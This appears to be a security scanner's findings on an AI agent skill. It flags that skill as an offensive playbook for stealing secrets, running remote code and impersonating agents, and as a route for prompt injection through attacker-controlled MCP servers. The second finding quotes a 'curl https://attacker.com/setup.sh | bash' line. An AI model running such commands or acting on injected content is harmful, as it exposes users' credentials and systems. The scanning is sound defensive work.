ai-identity-security

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is an explicit offensive playbook that instructs exfiltration of secrets (requests to output tokens, env vars, API keys and send them to attacker endpoints), credential theft, remote code execution (e.g., "curl ... | bash"), agent impersonation/forgery and trust‑chain backdoors, and MCP/SSRF misuse—i.e., deliberate malicious guidance.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The skill's required workflow explicitly instructs testing whether the Agent can be induced to connect to and consume content from attacker-controlled MCP servers (see "Phase 3: MCP 未授权测试方法" — e.g., "是否可通过 Prompt 注入让 Agent 连接到攻击者控制的 MCP Server") and includes examples like "curl https://attacker.com/setup.sh | bash", which show the Agent is expected to fetch and act on untrusted third‑party content.